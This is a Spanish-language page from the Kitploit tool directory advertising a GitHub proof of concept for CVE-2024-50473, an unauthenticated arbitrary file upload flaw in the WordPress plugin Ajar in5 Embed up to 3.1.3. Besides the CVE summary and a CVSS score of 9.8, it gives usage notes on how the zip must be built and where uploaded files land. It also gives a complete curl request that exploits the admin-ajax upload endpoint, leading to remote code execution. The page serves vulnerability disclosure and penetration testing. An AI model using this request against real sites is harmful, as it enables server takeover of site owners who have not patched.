Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50473 — Ajar in5 Embed <= 3.1.3 - Carga de archivos arbitraria sin autenticación | Kitploit
Herramientas/GitHubGitHub/randomrobbiebf/cve-2024-50473
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de Penetración
GitHubrandomrobbiebf/cve-2024-50473

CVE-2024-50473

Ajar in5 Embed <= 3.1.3 - Carga de archivos arbitraria sin autenticación

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50473

Ajar in5 Embed <= 3.1.3 - Carga de archivos arbitrarios no autenticada

Descripción:

El plugin Ajar in5 Embed para WordPress es vulnerable a cargas de archivos arbitrarios debido a la falta de validación del tipo de archivo en todas las versiones hasta la 3.1.3 inclusive. Esto permite que atacantes no autenticados suban archivos arbitrarios en el servidor del sitio afectado, lo que puede posibilitar la ejecución remota de código.

root@kitploit:~
Published: 2024-10-25 00:00:00
CVE: CVE-2024-50473
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score: 9.8
Slugs: ajar-productions-in5-embed

Nota: El archivo zip debe contener un index.html, aunque esté vacío, y se obtendrá un error 500, lo cual es normal.

Los archivos subidos se encontrarán en /wp-content/uploads/2024/php5/ - php5 es el nombre del archivo zip sin la extensión.

POC

root@kitploit:~
curl -X POST "http://kubernetes.docker.internal/wp-admin/admin-ajax.php?action=in5&in5=upload" \
-H "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0" \
-H "Accept: application/json, text/javascript, */*; q=0.01" \
-H "Accept-Language: en-US,en;q=0.5" \
-H "Accept-Encoding: gzip, deflate, br" \
-H "Referer: http://kubernetes.docker.internal/wp-admin/post.php?post=4142&action=edit" \
-H "X-Requested-With: XMLHttpRequest" \
-H "Content-Type: multipart/form-data" \
-F "customPath=wp-content/uploads/2024/" \
-F "files[]=@/path/to/php5.zip" \
--compressed
Descargar herramienta